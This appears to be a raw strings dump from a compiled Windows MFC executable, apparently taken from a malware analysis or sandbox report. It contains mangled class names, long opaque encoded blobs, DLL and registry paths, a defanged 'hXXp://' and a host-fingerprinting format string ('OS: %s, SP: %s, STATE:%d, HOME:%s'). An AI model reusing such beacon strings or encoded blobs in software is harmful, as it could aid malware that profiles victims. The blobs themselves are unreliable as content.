.?AVCMFCRibbonKeyTip@@

.?AVCOleCmdUI@@

.?AVCOleCmdUI@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

zcÁ

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.PAVCFileException@@

.PAVCFileException@@

.PAVCInternetException@@

.PAVCInternetException@@

XiCCA"ttNynnv`XXq/XXB LL8#XXduggo`bbNXllz\llK[nnr)nn2mFFVFuuJVbbJ;ggs#tt8 ttBsddJBXX2Plluroov~tt2{ooe$ddT%vvp?wwR0pp3HjjtSCCvvggVwwwxLVVG;vvNvLLr{bbK=ggH bbw*006-vvGiggW;mm4&XXRhkkx8bbAXmmfYuu1qooN&qqnRjjwAIIMpwwxcxxorQQdqqWGmm1j66sRXXm,ddu`WWcVjj2FoodqVV5iwwcsSSV"jjmPww6kuuJZNNzGwwxyqqd7uuJ|IIu\ppH{ggr}ggJvxxa CCJU33WnxxrfbbJRbbcduu40xxZ.qqC'vvp66d@CCceqqpfww2DjjO*kkeXII3nXXKixxzSwwH>RR4*llwr00C4ppv_33HyxxH HH6eQQ1fXXUmnnHzllc/uuJYlls,QQA(ww4TggHExxf ooxvVVYchhH[RRW%ooJrxxltWWJ]VVH~ccBcxx48nnHsLLZ(ccJEXXd_uuw4VVBBll4;dda'CCK3HH3Jww2(RRocbbK7ee1*ggmVLLC oocMllC6hhJfww3mkkff66vkllG}ggeLvveM66d|hhJ5llcdoo3TVVRYwww-11ARQQHZXXboSSwFqqn-nnx!VVZOjjxggg1NooH/ee5[ppe=SSE)ppwvnniPjje"RRJ\XXZpNNucbbHb55EXmm2&11BxyysnttJDkkfyllrCnnJ/RRv?oos=ddiQhhGMxxN[ttGbMMBSgge'IIl6xxevNN1,xx2^00b9oos xxJ$kke&ggg}bbG#lli|vvK,jj8ZSSwxUU4,hhKHnne4CCf3663*ww4oVVUsnnN*bbVRmm3lVV2{xxv(RRzkxx2RNNppwwf_lliZnnvOoo4hWWKsggs-vvegnn11bbKSNNR@mmN uu3#WWG%ll4hCCw'wwPWwwH566uDQQ41qqwgkkfDggdRWWp,VVh6nn4gSSJ{CCrMnni'ggNnjjGill4lxxPIxxxFFFE|llH455A(llwUggZ3xxA"nnGxmm2q331?xxcfqqnSQQrJXXp^xxe`IIz>uufz33b_XXv:ddH_wwBPnno@SS1=VVUjQQdw666*ggf033i^WWZIjjJ'ooJkllNiXXKZxxHBuuwAxxycSSeWjjykkks*LL2fwwd1qqitpp3ennppwwN:XXRAkkvAwwVJuuK/xx3GWWJ{006Zxx4}SSN|uu4jNNCJvvHww40WWJp00Rellc%SSA`xxc$ttZggwLggH8QQw|ll5XnnemNNwsnnH_RRb xxf|33O*uuf xxh/WW3~LLtzuuNauuN5llA@LLz$ggz6bbEgmmwEggfyhhN]NN2NooKEXXC(CCeI556yXX1oeeH7mmzSVV2#nn3snnt^CCz`lln?SS3{ddl5XXwQjj6!XXd1eeEVmmr,jjUhjj1tddP-uuH6LLWvoozqSS3OnnKQllkxnnJnNNjNnnKjXXr~pppWddeJQQm7LLR#hhNgllm?mmJ#IIK^vvpGtt4NllHANNNVttvfNNPTbbKvqq8)WWZZllLVCCd\ee2Juu3ZbbJokkxCuuARRHPnnvs00BTppJ200phXX3fnny6oo3vbb5;llH!qqt(CCeSnnTppp4{xxUGuuH533iYpp37LLI0jjfOIIO>kkxAuuZ!xxrîE#llevIIg%wwzgxx8_mmH\nn6dbbZ6qqjTccKhjj13SSKEllm|pp1-RRw/xxvPXXR9ttv$gg4hvvf,333wppm(xxY\hhH~00Bpmmfs33adSS2033I0kke>ggW"llejjZAddYCmmzAddxnnnvUggn(SSH ddRcuuZsNNh{mmZtjjvKggvoxx64ooK.NNpnmmf7wwR\WW3juu3!ttv[llzmoov=xxm,bbGJuuHjSS1$ggo4jjvNllR*ggwdVVz%gge%lliFXXNsLLZdxxewllrmxxAheeR{QQefxxTnQQNbxxMNggNlggt$ppHc33GRllm@nnr"ccGHVVA2ppK aaNQww2300sNnnpOuu3(ppA8LLN0nnJTNNyWggf$ww1Cvvf]nn4|CCd$ll1!ttckee5zllcZggr&xxe}IIe`mm1833wUvvG5jjkVccH-LLArxx2xNNM_uuH;RRMiSSB|llf!xxcJnn3\llm)MMH8ppe)FFR/CCHznnxivvxlSSH ppJvRRBSCCKSxxwmooHzEE4&bbJ/00f8nnfooG3nnnoccBNnnGfwwA@ee5GppNQaaECllc#XX4Gkkv*IIeyQQf@llLwwww=HH1Axxs4ttUkttGJxx6\XXvHnnjOSS3/xxz7jj3;llAGll2tVVTgppwKHHB7kkBNgge,uuwnddwnxxckVVEsWWc[ee4QccK}LL3[kkf4xxJMwww-qq8yppZ}ddxJxx3cHH61ooz nnC/nnNrXXJ-oofXxxu}vvcAddu$XX25VVZ.llxSFFH@ppp)uu2eQQ4GggEBllx&665,uupWnnI^mmNMddi#CCr>ddg[lld3qqERmmGGeeZkWWz^jjh"CCJ"jjxgvvf;008Ioo1/xxwipp2hIImpjjcSSS6dnnr/ee6oWWx)VVK_nnmaddEOooeP66CCxx3DLLgEjjN:XX8>ggHmFFAannwHVVTfmme&ooHJggG@ll3~QQHYRRyjvvx4qqd[xxvxeeZjj61SSweVV8-ppZWNNBAQQcwNNYavvvxXXl2bbJqNNiKwwNkkr xxe\nnNoSS6-jjdwllI3mm1@ww5BXXJqjjn7SSG6ooN.CCJmVVc1WWc.jjLAuuG(ddW.wwx|XXV4WWm7LLA%oox6LLuWnnZ(XXrBCCe`ddfBmm1ellIOxxH'VVH2xxsonnOmoovOdd2.nnZ>ddp=ooz=jjW'vvz#ll5`mm4\XXfnnn2zRR1PXXwZgg4uppvmIIM9llH0994OjjvGggaewwN;ee6mooHh66fQxxBTnnlImm2]VVn4bbwfNNCspppfooZFnnJ=ww5.ppz\ll3 ooG%ttP-uuZ]nnLckkeBxxfSmm2-IIm5wwwTLLJeppHfLLJSS1GnnGKxxBlxxxagg4~bb2L66kJbbmjLLxAbb1gllR"uuJmbb6CCCGktt5vbbpGnnC/wwrwVVTKmmwPRRw"ggB LLIwXX1wddPEvvN^ddrwSSmibbVill1rMM6%nn3RXXhIWW37NNr/wwZ|ll8@ww1qLLPihhKsqq4foofEggCsbbGdjj6sWWeyLLv"bbK!tt5hCCcNggwCuu4OllZ jjB)ll4UppdWVVuQQf(gg5HQQr=NN5zpprNNw2ttp6ddm5llZvggl/mmdI66k@kkpoof,ddvuWWz|uuZ0mm1=33i)wwcZVVg7xxr0uuExppKBXXMiQQK]uuPVmmGynnY.nnH3NNxsWWv}nnxEkkv2jjO%uu2'VVpyjjK.VV5BvvJfNNmGXXNsjjn1WW4sjji7SSK3FFVMmm1"66Moxxrejj1ZXX2ggwIee3BpprdjjT&jjK|ddJ WWHP00x-SSe'bb4NbbGiNNhYXX3*llTNxx16NNBojjN%nnvEwwzeHHAUbbH_SSE.llZ ddjHnn1\ll1/vvr'qqd@ttwTIIkBhhJW00eTCCzflldyWW3/llAell2[99E=llGnjjv/jjs-ttU6ttHe55Ncwwp>nnEAjjJjNNvHnnd2NNYTttvhllk=SSJa66q_vvzEddG>ttGJMMB&mm3=MME_ppvK554ejj1jooRdWWK>NN28jjNegga_oo2PSS6ljjB(llT2ggxJFFVYkkc6bbJ"kkeSLLzellGAbbJfbb4~nnM)nn1#ddTBjjw'xxJ&QQZbSS3`SSHkLLHlppNsjj1Zoof#00G~xxJ[llMSppsQeeEcppz;ggRTggr$uuAGggK9jju5jjwC00iySS1[55JwSSfO331$jjeoddKXWWv(jjEzccJwll3NXXA?nni\ppfOXXlBoorbaa5booHC55Z*xxGMHH5SvvrQggJCppGfqqZLooznww3 nn2MIIrEuu1DXXEYSSzSdda\pp4$jjR4CCvgggJcppfT336=ccJ4ggfMmmZMxxrsggeA66E^uuctt8?ttNfqqa"vvwOxxJYWW4TVVy}jjxYXXmxuuHIdds;mm13VVujuuN~VVH*nnf2HHNHSSZInnJ)wwwKggsdmmJJllx(oow(llBPppZyddf2SSJ_jj5=QQdmeeVgnn3>LLY1uur$jjVkxx4cjj6>WWfKxxI"XXd~HHZAnnd$NNRGmmw}UUEPmmG/nnxtXX3%LLZ^nnA,nnVowwfsnnu0vvsexxa]nnJ:NNusllZwNNzmXXeOdd3boow5FFA=WWcBbbJMQQG'ggTOCCf>MMNtWWrkLLTnllKRjjs.vvr!llYaXXK*nnO"SSckll3@QQfN00E[wwJ1HH1{ppeggp~ggf\lld-llP%WW2GnnwBhhGqaa4BnnwAjjO7kkedjjPgppNdqqzemmGzXXxNWWw.qq1XCCH)jjIBwwzRxxZ0wwB#ddoettx5ee3qXXNMLLP6mmKgxxENpp4QNNyyxxARnn2bbc7VVpKnnffddCxppx4XXsiSSB_llx@jjv#66Cxxn4ppfT00YOll1 SS6ammN[aaA;mmeCggWEQQHWnnrunns1dd1ppG?XXI:vvpvttJkuuHTggx0wwvu00zrWWJoXXxnnnfB33efmmwiggVNnnH#00t0wwGtNNn/SSeqdd67wwJ0XXm@ooKeNNCGbb2vnno_nnGBddc{jjNONNPWCCwUMMV XXvzNNdhnnd ddcXppp jjxzxxctnnAtpp2oLLuEE5FQQv~nnKCwwH_qqqkSSHo33LawwJCLL8(ggB.lluKWWZtXXv'ggfS00h]vvvs66v_bbJ}RRH8CCJCxxt`wwK\eeV@bbw_xxTGggr;VVZ}mmfsMMVWpp38xxwAQQz[llrASS11eeN#WWmYnnC?jjcYjjUjttB{EEBQQQJYddI?nnmltt8DttJpXXIPSS2BllD3SSJ^xxDhuuzUaa33uuz9eeEkuuz[SS4QttBVEEB|SSrvggTZnnJlNNUHcc4[jjNiSSKrnnN)SSB]tt8`ttK-qqAQQQ2]bbYZCCva003kbbvWW4WXX3mWWc:xxt^uuz*ggEBnncJuuEaggx@ee4^ccHmbb1*CCG-ggy0mmpTqqP5XXH>FF2,SSe]IIvdwwwoNNV'nn2Addw3XXvKIIP:uud.MMH)xxs%LLOxuu1fXXy?CCvnLL3ijjJE66Rmww3MXX6tnnex66u\xx1z66ynvvJ]66HJjj4lXXrCggv9LLo$llv?jjZsoopPlls,ggK*xxR{kkvT66zzWWB;xxgCbbHHtt1kQQK.nnbyWWwmddj$oof.oo4hXXx[llI nnNjjj3bppAVnnb[nn1]11Z#jjeGXXzTbb4innhpjjfLNNNooAkggvPLLL6jjJ?RRPSjjJ*xxKLCCz#VVLQSSHpddaZQQx*LL8mCCwfRRCRttp:llksxxGiaa1(SSx?ggjWnnZ>XXa9CCKbXX3,llK.LLwtxxw VVNQXX4nLLY/nnpTqqIXggKRqqxUxxrBxxG!uuw\RRJoww1833YKggJAggIYvvfRggunmmv900p:wwewNNG_nnx7nnuUjj4kggGWWWvkddL7SS4LXXA-ppmyxxL*WWr=HH2WooHJllOLmm1|MMP\xxN?jjO-nn4 nnE3XXeR335XXrjXXVFSSJ4xxS/ccdzll3HXXfE00A;WWv\ddU/SSA"ttUVttK}ggN{nn3R00ZbXXcHqqH cc2MIIN/CCmjtt8httKRxxEmnnf9dd1(nnc/ll3DXXf?00AJWWviddUunncXjjMCSSs.ttUsttK llAgbbv^jjN>cc2bRRT`nn3h00Ztnnc6gg2ZnncZttB9kkBAggUTQQ2'SSYtWWf#33IdQQv4NNU WWv%IINoXXfsVVVWXXs266GtQQ2;11Bxyys`gg13SSJ@ddG9nnx 003%SSJXRRDVnnJn00AQQQv*dd1EttG1MMB WWr1ll1&SSzlLLSByy39EETSggc)jjSyyy2XjjK*WWm:33BRWWv~66SLyy4{llA bbv>jjN5yyJ/jjK/WWp^00LHcc2LRRT}nnZr11NBCCsFnn5Jcc4&jjN!SSK4nnL*bb2{xx2`nncLtt0yggc;uuJ=CCdt00ZznncOgg2WWWvejjNlWWv0oo0wggcYuuJnn2UxxYMiimkxxZ ttBWEEB;XXJDxxA-SS2)NNT9QQBvtt8vttJ`XXI

XiCCA"ttNynnv`XXq/XXB LL8#XXduggo`bbNXllz\llK[nnr)nn2mFFVFuuJVbbJ;ggs#tt8 ttBsddJBXX2Plluroov~tt2{ooe$ddT%vvp?wwR0pp3HjjtSCCvvggVwwwxLVVG;vvNvLLr{bbK=ggH bbw*006-vvGiggW;mm4&XXRhkkx8bbAXmmfYuu1qooN&qqnRjjwAIIMpwwxcxxorQQdqqWGmm1j66sRXXm,ddu`WWcVjj2FoodqVV5iwwcsSSV"jjmPww6kuuJZNNzGwwxyqqd7uuJ|IIu\ppH{ggr}ggJvxxa CCJU33WnxxrfbbJRbbcduu40xxZ.qqC'vvp66d@CCceqqpfww2DjjO*kkeXII3nXXKixxzSwwH>RR4*llwr00C4ppv_33HyxxH HH6eQQ1fXXUmnnHzllc/uuJYlls,QQA(ww4TggHExxf ooxvVVYchhH[RRW%ooJrxxltWWJ]VVH~ccBcxx48nnHsLLZ(ccJEXXd_uuw4VVBBll4;dda'CCK3HH3Jww2(RRocbbK7ee1*ggmVLLC oocMllC6hhJfww3mkkff66vkllG}ggeLvveM66d|hhJ5llcdoo3TVVRYwww-11ARQQHZXXboSSwFqqn-nnx!VVZOjjxggg1NooH/ee5[ppe=SSE)ppwvnniPjje"RRJ\XXZpNNucbbHb55EXmm2&11BxyysnttJDkkfyllrCnnJ/RRv?oos=ddiQhhGMxxN[ttGbMMBSgge'IIl6xxevNN1,xx2^00b9oos xxJ$kke&ggg}bbG#lli|vvK,jj8ZSSwxUU4,hhKHnne4CCf3663*ww4oVVUsnnN*bbVRmm3lVV2{xxv(RRzkxx2RNNppwwf_lliZnnvOoo4hWWKsggs-vvegnn11bbKSNNR@mmN uu3#WWG%ll4hCCw'wwPWwwH566uDQQ41qqwgkkfDggdRWWp,VVh6nn4gSSJ{CCrMnni'ggNnjjGill4lxxPIxxxFFFE|llH455A(llwUggZ3xxA"nnGxmm2q331?xxcfqqnSQQrJXXp^xxe`IIz>uufz33b_XXv:ddH_wwBPnno@SS1=VVUjQQdw666*ggf033i^WWZIjjJ'ooJkllNiXXKZxxHBuuwAxxycSSeWjjykkks*LL2fwwd1qqitpp3ennppwwN:XXRAkkvAwwVJuuK/xx3GWWJ{006Zxx4}SSN|uu4jNNCJvvHww40WWJp00Rellc%SSA`xxc$ttZggwLggH8QQw|ll5XnnemNNwsnnH_RRb xxf|33O*uuf xxh/WW3~LLtzuuNauuN5llA@LLz$ggz6bbEgmmwEggfyhhN]NN2NooKEXXC(CCeI556yXX1oeeH7mmzSVV2#nn3snnt^CCz`lln?SS3{ddl5XXwQjj6!XXd1eeEVmmr,jjUhjj1tddP-uuH6LLWvoozqSS3OnnKQllkxnnJnNNjNnnKjXXr~pppWddeJQQm7LLR#hhNgllm?mmJ#IIK^vvpGtt4NllHANNNVttvfNNPTbbKvqq8)WWZZllLVCCd\ee2Juu3ZbbJokkxCuuARRHPnnvs00BTppJ200phXX3fnny6oo3vbb5;llH!qqt(CCeSnnTppp4{xxUGuuH533iYpp37LLI0jjfOIIO>kkxAuuZ!xxrîE#llevIIg%wwzgxx8_mmH\nn6dbbZ6qqjTccKhjj13SSKEllm|pp1-RRw/xxvPXXR9ttv$gg4hvvf,333wppm(xxY\hhH~00Bpmmfs33adSS2033I0kke>ggW"llejjZAddYCmmzAddxnnnvUggn(SSH ddRcuuZsNNh{mmZtjjvKggvoxx64ooK.NNpnmmf7wwR\WW3juu3!ttv[llzmoov=xxm,bbGJuuHjSS1$ggo4jjvNllR*ggwdVVz%gge%lliFXXNsLLZdxxewllrmxxAheeR{QQefxxTnQQNbxxMNggNlggt$ppHc33GRllm@nnr"ccGHVVA2ppK aaNQww2300sNnnpOuu3(ppA8LLN0nnJTNNyWggf$ww1Cvvf]nn4|CCd$ll1!ttckee5zllcZggr&xxe}IIe`mm1833wUvvG5jjkVccH-LLArxx2xNNM_uuH;RRMiSSB|llf!xxcJnn3\llm)MMH8ppe)FFR/CCHznnxivvxlSSH ppJvRRBSCCKSxxwmooHzEE4&bbJ/00f8nnfooG3nnnoccBNnnGfwwA@ee5GppNQaaECllc#XX4Gkkv*IIeyQQf@llLwwww=HH1Axxs4ttUkttGJxx6\XXvHnnjOSS3/xxz7jj3;llAGll2tVVTgppwKHHB7kkBNgge,uuwnddwnxxckVVEsWWc[ee4QccK}LL3[kkf4xxJMwww-qq8yppZ}ddxJxx3cHH61ooz nnC/nnNrXXJ-oofXxxu}vvcAddu$XX25VVZ.llxSFFH@ppp)uu2eQQ4GggEBllx&665,uupWnnI^mmNMddi#CCr>ddg[lld3qqERmmGGeeZkWWz^jjh"CCJ"jjxgvvf;008Ioo1/xxwipp2hIImpjjcSSS6dnnr/ee6oWWx)VVK_nnmaddEOooeP66CCxx3DLLgEjjN:XX8>ggHmFFAannwHVVTfmme&ooHJggG@ll3~QQHYRRyjvvx4qqd[xxvxeeZjj61SSweVV8-ppZWNNBAQQcwNNYavvvxXXl2bbJqNNiKwwNkkr xxe\nnNoSS6-jjdwllI3mm1@ww5BXXJqjjn7SSG6ooN.CCJmVVc1WWc.jjLAuuG(ddW.wwx|XXV4WWm7LLA%oox6LLuWnnZ(XXrBCCe`ddfBmm1ellIOxxH'VVH2xxsonnOmoovOdd2.nnZ>ddp=ooz=jjW'vvz#ll5`mm4\XXfnnn2zRR1PXXwZgg4uppvmIIM9llH0994OjjvGggaewwN;ee6mooHh66fQxxBTnnlImm2]VVn4bbwfNNCspppfooZFnnJ=ww5.ppz\ll3 ooG%ttP-uuZ]nnLckkeBxxfSmm2-IIm5wwwTLLJeppHfLLJSS1GnnGKxxBlxxxagg4~bb2L66kJbbmjLLxAbb1gllR"uuJmbb6CCCGktt5vbbpGnnC/wwrwVVTKmmwPRRw"ggB LLIwXX1wddPEvvN^ddrwSSmibbVill1rMM6%nn3RXXhIWW37NNr/wwZ|ll8@ww1qLLPihhKsqq4foofEggCsbbGdjj6sWWeyLLv"bbK!tt5hCCcNggwCuu4OllZ jjB)ll4UppdWVVuQQf(gg5HQQr=NN5zpprNNw2ttp6ddm5llZvggl/mmdI66k@kkpoof,ddvuWWz|uuZ0mm1=33i)wwcZVVg7xxr0uuExppKBXXMiQQK]uuPVmmGynnY.nnH3NNxsWWv}nnxEkkv2jjO%uu2'VVpyjjK.VV5BvvJfNNmGXXNsjjn1WW4sjji7SSK3FFVMmm1"66Moxxrejj1ZXX2ggwIee3BpprdjjT&jjK|ddJ WWHP00x-SSe'bb4NbbGiNNhYXX3*llTNxx16NNBojjN%nnvEwwzeHHAUbbH_SSE.llZ ddjHnn1\ll1/vvr'qqd@ttwTIIkBhhJW00eTCCzflldyWW3/llAell2[99E=llGnjjv/jjs-ttU6ttHe55Ncwwp>nnEAjjJjNNvHnnd2NNYTttvhllk=SSJa66q_vvzEddG>ttGJMMB&mm3=MME_ppvK554ejj1jooRdWWK>NN28jjNegga_oo2PSS6ljjB(llT2ggxJFFVYkkc6bbJ"kkeSLLzellGAbbJfbb4~nnM)nn1#ddTBjjw'xxJ&QQZbSS3`SSHkLLHlppNsjj1Zoof#00G~xxJ[llMSppsQeeEcppz;ggRTggr$uuAGggK9jju5jjwC00iySS1[55JwSSfO331$jjeoddKXWWv(jjEzccJwll3NXXA?nni\ppfOXXlBoorbaa5booHC55Z*xxGMHH5SvvrQggJCppGfqqZLooznww3 nn2MIIrEuu1DXXEYSSzSdda\pp4$jjR4CCvgggJcppfT336=ccJ4ggfMmmZMxxrsggeA66E^uuctt8?ttNfqqa"vvwOxxJYWW4TVVy}jjxYXXmxuuHIdds;mm13VVujuuN~VVH*nnf2HHNHSSZInnJ)wwwKggsdmmJJllx(oow(llBPppZyddf2SSJ_jj5=QQdmeeVgnn3>LLY1uur$jjVkxx4cjj6>WWfKxxI"XXd~HHZAnnd$NNRGmmw}UUEPmmG/nnxtXX3%LLZ^nnA,nnVowwfsnnu0vvsexxa]nnJ:NNusllZwNNzmXXeOdd3boow5FFA=WWcBbbJMQQG'ggTOCCf>MMNtWWrkLLTnllKRjjs.vvr!llYaXXK*nnO"SSckll3@QQfN00E[wwJ1HH1{ppeggp~ggf\lld-llP%WW2GnnwBhhGqaa4BnnwAjjO7kkedjjPgppNdqqzemmGzXXxNWWw.qq1XCCH)jjIBwwzRxxZ0wwB#ddoettx5ee3qXXNMLLP6mmKgxxENpp4QNNyyxxARnn2bbc7VVpKnnffddCxppx4XXsiSSB_llx@jjv#66Cxxn4ppfT00YOll1 SS6ammN[aaA;mmeCggWEQQHWnnrunns1dd1ppG?XXI:vvpvttJkuuHTggx0wwvu00zrWWJoXXxnnnfB33efmmwiggVNnnH#00t0wwGtNNn/SSeqdd67wwJ0XXm@ooKeNNCGbb2vnno_nnGBddc{jjNONNPWCCwUMMV XXvzNNdhnnd ddcXppp jjxzxxctnnAtpp2oLLuEE5FQQv~nnKCwwH_qqqkSSHo33LawwJCLL8(ggB.lluKWWZtXXv'ggfS00h]vvvs66v_bbJ}RRH8CCJCxxt`wwK\eeV@bbw_xxTGggr;VVZ}mmfsMMVWpp38xxwAQQz[llrASS11eeN#WWmYnnC?jjcYjjUjttB{EEBQQQJYddI?nnmltt8DttJpXXIPSS2BllD3SSJ^xxDhuuzUaa33uuz9eeEkuuz[SS4QttBVEEB|SSrvggTZnnJlNNUHcc4[jjNiSSKrnnN)SSB]tt8`ttK-qqAQQQ2]bbYZCCva003kbbvWW4WXX3mWWc:xxt^uuz*ggEBnncJuuEaggx@ee4^ccHmbb1*CCG-ggy0mmpTqqP5XXH>FF2,SSe]IIvdwwwoNNV'nn2Addw3XXvKIIP:uud.MMH)xxs%LLOxuu1fXXy?CCvnLL3ijjJE66Rmww3MXX6tnnex66u\xx1z66ynvvJ]66HJjj4lXXrCggv9LLo$llv?jjZsoopPlls,ggK*xxR{kkvT66zzWWB;xxgCbbHHtt1kQQK.nnbyWWwmddj$oof.oo4hXXx[llI nnNjjj3bppAVnnb[nn1]11Z#jjeGXXzTbb4innhpjjfLNNNooAkggvPLLL6jjJ?RRPSjjJ*xxKLCCz#VVLQSSHpddaZQQx*LL8mCCwfRRCRttp:llksxxGiaa1(SSx?ggjWnnZ>XXa9CCKbXX3,llK.LLwtxxw VVNQXX4nLLY/nnpTqqIXggKRqqxUxxrBxxG!uuw\RRJoww1833YKggJAggIYvvfRggunmmv900p:wwewNNG_nnx7nnuUjj4kggGWWWvkddL7SS4LXXA-ppmyxxL*WWr=HH2WooHJllOLmm1|MMP\xxN?jjO-nn4 nnE3XXeR335XXrjXXVFSSJ4xxS/ccdzll3HXXfE00A;WWv\ddU/SSA"ttUVttK}ggN{nn3R00ZbXXcHqqH cc2MIIN/CCmjtt8httKRxxEmnnf9dd1(nnc/ll3DXXf?00AJWWviddUunncXjjMCSSs.ttUsttK llAgbbv^jjN>cc2bRRT`nn3h00Ztnnc6gg2ZnncZttB9kkBAggUTQQ2'SSYtWWf#33IdQQv4NNU WWv%IINoXXfsVVVWXXs266GtQQ2;11Bxyys`gg13SSJ@ddG9nnx 003%SSJXRRDVnnJn00AQQQv*dd1EttG1MMB WWr1ll1&SSzlLLSByy39EETSggc)jjSyyy2XjjK*WWm:33BRWWv~66SLyy4{llA bbv>jjN5yyJ/jjK/WWp^00LHcc2LRRT}nnZr11NBCCsFnn5Jcc4&jjN!SSK4nnL*bb2{xx2`nncLtt0yggc;uuJ=CCdt00ZznncOgg2WWWvejjNlWWv0oo0wggcYuuJnn2UxxYMiimkxxZ ttBWEEB;XXJDxxA-SS2)NNT9QQBvtt8vttJ`XXI

truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX

truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX

5(5,50545

5(5,50545

;

;

5%5U5Z5

5%5U5Z5

9$9*90969

9$9*90969

4 4$4(4,40444

4 4$4(4,40444

0#14112:2

0#14112:2

88J8g8

88J8g8

1

3%3.3=3[3
5U5d5}5
1/2
9#:4:";0;
4 585=5_5
;-;6;?;_;
>->5>@>{>
2$2*20262
6*747:7@7~7
2/2u2{2
3$4-464^4
3%4X4g4p4
9 9$9(9,9
4 4$4(4,40444^6
>$>,>2>8>\>
7"7*727:7`7
2-2Z2}2
: :$:(:,:
7 7$7(7,7074787
3 3$3(3,30343
4 4$4(4,4044484
5 5$5(5,5054585
= =$=(=,=0=4=8=
8 8$8(8,8084888
? ?$?(?,?0?4?
> ?(?,?0?4?8?@?\?
.----/01/01/01
{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|
{|{|{|{|{|{|{|
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
%s%s.dll
E%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
Advapi32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
Ecomctl32.dll
Ecomdlg32.dll
Eshell32.dll
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
{X-X-X-XX-XXXXXX}
PTF://
hXXp://
@WININET.DLL
HTTP/1.0
mfcm100u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
OLEAUT32.DLL
%sCLSID\%s
%d.%d
TYPELIB\%s
CLSID\%s
CLSID\%s\%s
SHELL32.DLL
lXXxXXXXXXXX
dwmapi.dll
UxTheme.dll
eShell32.dll
%s:%x:%x:%x:%x
r%s\shell\open\%s
%s\shell\print\%s
%s\shell\printto\%s
%s\DefaultIcon
%s\ShellNew
%s\ShellEx
\{8895b1c6-b41f-4c1c-a562-0d564250836f}
ddeexec
Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f{8895b1c6-b41f-4c1c-a562-0d564250836f}
{E357FCCD-A995-4576-B01F-234630154E96}
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers
%s\ShellEx\%s
COMCTL32.DLL
USER32.DLL
%sMFCToolBar-%d%x
%sMFCToolBar-%d
ShortcutKeys
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
IDB_OFFICE2007_RIBBON_KEYTIP_BACK
KEYTIP
%sKeyboard-%d
KeyboardManager
%sCommandManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
propsys.dll
%2x%2x%2x
xxx
%s(%i)
MFCLink_UrlPrefix
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
&%d %s
%s-%d
%sMDIClientArea-%d
Zf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sMFCRibbonBar-%d%x
%sMFCRibbonBar-%d
%sPane-%d%x
%sPane-%d
windows
ShowCmd
QHex={X,X,X}
1&0 %s
X%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
Yf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
Ymsctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
@%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
[%d, %d, %d
%d, %d
[RICHED32.DLL
RICHED20.DLL
\%s %s
\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%s-Bar%d
%s-Summary
MRUDockLeftPos
Bar#%d
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
]f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockcont.cpp
^f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelink.cpp
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
Windows XP
Windows Server 2003
Windows Vista
Windows 98
Windows Me
Windows 2000, Windows NT 4.0, or Windows 95
Win32s on Windows 3.1.
OS: %s, SP: %s, STATE:%d, HOME:%s
